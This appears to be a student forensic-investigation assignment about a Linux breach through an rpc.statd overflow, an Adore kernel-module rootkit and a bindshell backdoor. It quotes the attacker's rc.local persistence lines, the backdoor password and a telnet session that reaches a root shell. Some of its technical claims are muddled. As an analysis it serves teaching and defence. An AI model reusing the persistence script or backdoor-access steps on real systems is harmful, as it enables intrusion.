E-crime investigation. Security breach on a Linux Operation System - Assignment Example

? Table of Contents Investigation ------------------------------- Page 2-9 Answers ------------------------------- Page 9-10 Prevention ------------------------------- Page 10 Mitigation ------------------------------- Page 10-13 Conclusion ------------------------------- Page 13 References ------------------------------- Page 14 Investigation Andy found concrete evidence from the deleted log file entry on Stilianos system that was initially compromised on 18th September Sep 18 02:42:54 victim rpc.statd[349]: gethostbyname error for ^X[buffer overrun shell code removed]. Likewise, the system was than targeted by ‘rpc.statd’ overflow. Secondly, Andy investigated the MAC times of some important files. On the UNIX platform, there are three different time stamps for a particular file i.e. Modify, Access and Change. If we elaborate these further, the first time stamp named as ‘modify’ or the ‘mtime’ is updated when there is some change or modification. Likewise, in case of a directory, the time stamp is updated when there are changes / modifications or deletion occurs within the file in that particular directory. The second time stamp known as the ‘atime’ is updated for a file when it is executed or accessed. The third time stamp Change that is called as ‘ctime’ is updated when the data structure enclosing metadata of a file is accessed by the file system to define information of a file including owner, group name, access rights etc. are modified. However, during a forensic investigation, MAC times can provide a comprehensive clues if remains unchanged. Likewise, it illustrates the changes that occurred on the file system. Andy will use the TCT mactime program that is a part of the TCT tool kit for printing the MACtimes for a series of files to get an in depth view of what actually happened and how the hacker has compromised the system. Likewise, the mactime program develops a database of time stamps linked with the files of the system (Nemeth, Snyder et al. 2007). It was detected that on September 20 i.e. few days after the initial compromise of the system, the hacker entered in the system via a telnet command and started manipulating file system and server. The command below demonstrates evidence: Sep 20 00 15:46:05 31376 .a. -rwxr-xr-x root root/mount/usr/sbin/in.telnetd Sep 20 00 15:46:39 20452 .c -rwxr-xr-x root root/mount/bin/login After one hour of the system being compromised, a directory was established named as /dev/ttypq/ on the file system and soon a distrustful and unknown file starts appearing and modified on the file system. The most suspicious files were named as ipv6.0, rpc.status and rc.local. Sep 20 00 16:49:47 949 ..c -rwxr-xr-x root root /mount/etc/rc.d/rc.local 209 ..c -rwx------ root root /mount/usr/sbin/initd Sep 20 00 16:50:11 4096 .a. drwxr-xr-x operator 11 /mount/dev/ttypq/... Sep 20 00 16:52:12 7704 .a. -rw-r--r-- root root /mount/lib/modules/2.2.16-3/net/ipv6.o 209 .a. -rwx------ root root /mount/usr/sbin/initd 222068 .a. -rwxr-xr-x root root /mount/usr/sbin/rpc.status Andy’s investigation addressed the ipv6.0 file that was a modular visible string related to the suspected sockets of the network i.e. TCP port 32411 and TCP port 3457, more than one user account names, illegitimate use of the Ethernet interface to relay all the traffic visible on the network. prover# strings ipv6.o check_logfilter kernel_version=2.2.16-3 my_atoi :32411 my_find_task :3457 is_invisible :6667 is_secret :6664 iget :6663 iput :6662 hide_process :6661 hide_file :irc __mark_inode_dirty :6660 unhide_file :6668 n_getdents nobody o_getdents telnet n_fork operator o_fork Proxy n_clone proxy o_clone undernet.org n_kill Undernet.org o_kill netstat n_ioctl syslogd dev_get klogd boot_cpu_data promiscuous mode __verify_write . . . o_ioctl adore.c n_write gcc2_compiled. o_write __module_kernel_version n_setuid we_did_promisc cleanup_module netfilter_table o_setuid check_netfilter init_module strstr __this_module logfilter_table sys_call_table In the above strings, a string named as adore.c represents the source file for the loaded kernel module (LKM). These modules can be directly loaded into the Linux kernel dynamically. Likewise, by using LKM, the functionality of kernel enhances without the use of modifications to the base image distribution of the kernel (Jakobsson, Ramzan 2008). Likewise, it is also used for loading hardware and device drivers in an asynchronous mode. Adore.c is a Trojan file or a suspicious remote program that is providing connectivity to the hacker for gaining control of the system. Moreover, representing itself as an LKM that has capabilities of hiding network connections, related processes and files, system administrator or network engineers were not able to diagnose anything wrong with the system. Moreover, firewalls or security tools were also bypassed and were not able to analyze modifications in checksums of system binaries. After analyzing Adore.c, the second file that needs to be investigated was rc.local that represented a modification to inode simultaneously. Comparing the infected system with the clean system running on Red Hat Linux demonstrated that the command script /usr/sbin/initd were included in the end: #!/bin/sh # # automatic install script to load kernel modules for ipv6 support. # do not edit the file directly. /sbin/insmod -f /lib/modules/2.2.16-3/net/ipv6.o >/dev/null 2>/dev/ null /usr/sbin/rpc.status Hacker was intelligent and added these lines to make the script legitimate and is manageable by one of many utilities of the operating system itself. Every system administrator or network engineer does not have skills to verify authenticity of the script and can be easily deceived. Moreover, after restarting the system, the system adds the KLM Trojan without any warnings and notifications. The third and the last file rpc.status is the next one to be investigated. The analysis starts with the following script: leeto bindshell. Enter valid IPX address: gdb (nfsiod) socket bind listen accept /bin/sh /dev/null However, in order to get the insights of the program named as rpc.status, a reverse engineering tool is required. Likewise, for this forensic investigation, a reverse engineering query tool was deployed to conduct a disassembly of the program. The result of the assembler code illustrated that the string was established from byte to byte, as shown in the prompt to the right: 0x080481a9 movl $0x8071b60,0xfffffffc(%ebp) Possible reference to string: "Enter valid IPX address: " 0x080481b0 movl $0x8071b74,0xfffffff8(%ebp) Possible reference to string: "" 0x080481b7 push $0x8071b8e 0x080481bc lea 0xfffffbec(%ebp),%eax 0x080481c2 push %eax 0x080481c3 call 0x0804d4b0 0x080481c8 add $0x8,%esp 0x080481cb movb $0x76,0xfffffbec(%ebp) ; 'v' 0x080481d2 movb $0x33,0xfffffbed(%ebp) ; '3' 0x080481d9 movb $0x33,0xfffffbee(%ebp) ; '3' 0x080481e0 movb $0x63,0xfffffbef(%ebp) ; 'c' 0x080481e7 movb $0x74,0xfffffbf0(%ebp) ; 't' 0x080481ee movb $0x75,0xfffffbf1(%ebp) ; 'u' 0x080481f5 movb $0x6d,0xfffffbf2(%ebp) ; 'm' 0x080481fc movb $0x31,0xfffffbf3(%ebp) ; '1' 0x08048203 movb $0x32,0xfffffbf4(%ebp) ; '2' 0x0804820a movb $0x0,0xfffffbf5(%ebp) ; '/0' 0x08048211 movw $0x2,0xfffffbd0(%ebp) 0x0804821a push $0xa04 0x0804821f call 0x0804da80 0x08048224 add $0x4,%esp 0x08048227 mov %eax,%eax 0x08048229 mov %ax,0xfffffbd2(%ebp) 0x08048230 movl $0x0,0xfffffbd4(%ebp) 0x0804823a push $0x8 0x0804823c lea 0xfffffbd0(%ebp),%eax 0x08048242 lea 0x8(%eax),%edx 0x08048245 push %edx 0x08048246 call 0x0804d6a0 0x0804824b add $0x8,%esp There was an indication that if a password ‘string v33ctum12’ is compared with the string available at the prompt, the assumption was completed on the testing system: prover# telnet 192.168.0.1 3457 Trying 192.168.0.1... Connected to foo.bar (192.168.0.1). Escape character is '^]'. Enter valid IPX address: v33ctum12 leeto bindshell. bash# id id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) bash# Therefore, the conclusion can be made that the hacker has modified the boot sequence of the system that is forcing the file /usr/sbin/initd to be executed. Likewise, the execution in turn triggers the adore LKM along with the initialization of bindshell program every time the system starts or reboots. Hence, rebooting does not impose any impact on the Trojan or a backdoor program of the hacker that is currently operational in the infected system. Answers Stilianos system was first compromised on September 18th from the rpc.statd overflow, as explained under bugtraq # 1480 and filed in the CVE database with CVE-2000-0666. (Valdes, Zamboni, n.d)The CVE-2000-0666 is defined as the multi vector worm that is capable of infecting via multiple infection vectors. The two extra services that were not shown by using the local lsof because there was a backdoor shell and an IRC eggdrop bot installed in the system. This remotely controlled computerized bot originated from Internet Relay Chat (IRC) was first developed in 1993 and support a large number of concurrent users (Mutton, 2004). The traffic detected on Stilianos system running Linux operating system was actually generated by the IRC eggdrop bot, as it was installed on the system and was fully operational. The ipv6.o module was a kernel that concealed all the files of the hacker on the system. The file named as rpc.status was a Trojan or backdoor software that was designed to provide a transparent remote connection to the hacker for accessing the system. Prevention The prevention of this type of attack is simply alertness, awareness and watchfulness. Patch management must be an essential part of securing systems and the network from threats. Likewise, security patches must be updated on every system, as it is extremely essential. If Stilianos system had been updated with latest and up to data security patches, this attack would not have been successful. Mitigation Threats associated with kernel modules that are loadable is a complex tasks and LKM that are already explained earlier to be rootkits, they have capabilities of redirecting system calls and isolate any process on the system they want. Moreover, they can also make programs to do wrong checksum comparisons that are utilized to open and read the contents of the file. Likewise, this process is conducted by executing a separate program whenever an execution call is requested. Comparison of inode that does not incorporates file that behaves as an insertion vector for the KLM will give an output of false negative check for system integrity. It is a fact that there are numerous KLM’s that are available for different operating systems and makes the task very complex for the system owner to investigate the issue on instant or urgent basis. Moreover, the complexity of the situation also does not ensure the trust level of the operating system. However, to deal with these situations, a high overhead cost is required for scanning the system with remote network traffic monitoring system. Many tools such as tcpdump, snort, Microsoft logminor and nmap can be used to identify and detect threats. Moreover, honeypots provides layered defense to monitor any probe or attack from a cyber-criminal. Likewise, a demilitarized zone (DMZ) is defined and a system must be place within the DMZ. Bastion host will monitor the system placed within the DMZ and detects any threat that is considered an anomaly. Moreover, log file management is not effective and most of the log files are erased after a reboot. However, to cope up with this issue, Intrusion Detection System IDS is a recommended solution, as it logs all activities from each component on the network and sense for anomalies or signatures depending on the requirements. However, for detecting a rootkit from installing or operating, a host based IDS that is known as the Host Intrusion Detection System (HIDS) can also play a vital role. Vulnerability assessment is conducted to analyze the probability of threats. The probable vulnerabilities and system flaws will enable the intruder to use as resources for breaching in the system. It summarizes both factors, including physical and information security which shows positive and negative impacts of these factors. There are significant advantages for using vulnerability assessments. The approach is to focus on security Ability to identify probability of threats before hacker uses it. Keeping the system updated with latest virus updates and security patches. Develop expertise for the home PC user Eliminates data loss The first phase of vulnerability assessment is the investigation phase. The investigation phase is conducted to gather information regarding the system and resources. The threats are prioritized before assessment. The identification of critical components is conducted in order to prioritize threats. After prioritization, related plug-in is selected before execution. Vulnerability assessment includes the scanning of all open ports of the system. This phase also conducts scanning of all known vulnerabilities. The next phase includes reporting of the findings which are extracted by investigation phase. The findings are then categorized in different priorities. The report illustrates open ports, number of vulnerabilities found at high status, number of vulnerabilities found at medium status, number of vulnerabilities found at low status. Report also includes host information including the ‘netbios’ name, DNS name and operating system. This phase also discuss the methodologies for enhancing the security of the system. For performing vulnerability testing of the home PC, all the possible communication links will be analyzed to protect the home PC. All the threats will be prevented including data stored in the hard drive, network links, tools for preventing viruses, spywares, phishing filters, online transactions etc. First the outbound controls need to be analyzed. This can be done by assuming that what type of information the hacker will get. IP addresses, Gateway, Subnet mask, DNS IP addresses, Firewall protection techniques, antivirus protection techniques, Wireless encryption protocols (If the user is using Wi-Fi), HTTP traffic, SMTP and many more. Inbound controls give the advantage to the user as all privileges are granted for controlling functions. Organizations adopt strategies to prevent networks from external threats but they do not emphasize much on preventing networks from internal threats. For example employees can steal important data in portable USB drives, unauthorized access; eaves dropping etc. three tools will be used to scan system for possible vulnerabilities. It is already understood that the breach was successful by installing root kits or backdoor that establish instant connectivity from the system to the hacker. The hackers use these programs for extracting personal data from the hard drive, personal images, financial information and much more. The computer will not notify any activity and will not show the existence of this special software virus. It is not necessary for the virus to be activated all the time. The hacker will trigger it anytime he wants. This is the reason why organizations that are fighting hacking and virus launch security patches and security updates on regular basis. The tools which is used for vulnerability testing is the more advanced approach rather than cleaning the system by an antivirus again and again. Vulnerability scanning is an efficient approach to handle any potential threats which may occur later. Organizations are also integrating vulnerability scanner in there antivirus products. Conclusion We have demonstrated the detailed investigation of the security breach that was a combination of a botnet, Trojan along with three suspicious services. Each and every suspicious log is discussed in detail. Answers to all the questions have been covered along with prevention and mitigation methodologies. The breach happened due to outdated security patches on the Linux system. It is obvious that the hacker was intelligent and was able to modify system files, install services and changed system privileges as well. Mitigation techniques include: Tools capable of monitoring live network traffic such as tcpdump DMZ for providing layered defense and bastion host to detect anomalies at the initial level Patch management for keeping all the systems up to date Vulnerability scanning to check loopholes on a regular basis References NEMETH, E., SNYDER, G. and HEIN, T.R., 2007. Linux administration handbook Upper Saddle River, NJ: Prentice Hall. JAKOBSSON, M. and RAMZAN, Z., 2008. Crimeware: understanding new attacks and defenses Upper Saddle River, NJ: Addison-Wesley. VALDES, A.D. and ZAMBONI, D., Recent Advances in Intrusion Detection: 8th International Symposium, RAID 2005, Seattle, WA, USA, September 7-9, 2005, Revised Papers (Lecture Notes in Computer Science / Security and Cryptology) Springer. MUTTON, P., IRC hacks Beijing ; O'Reilly, c2004. Read More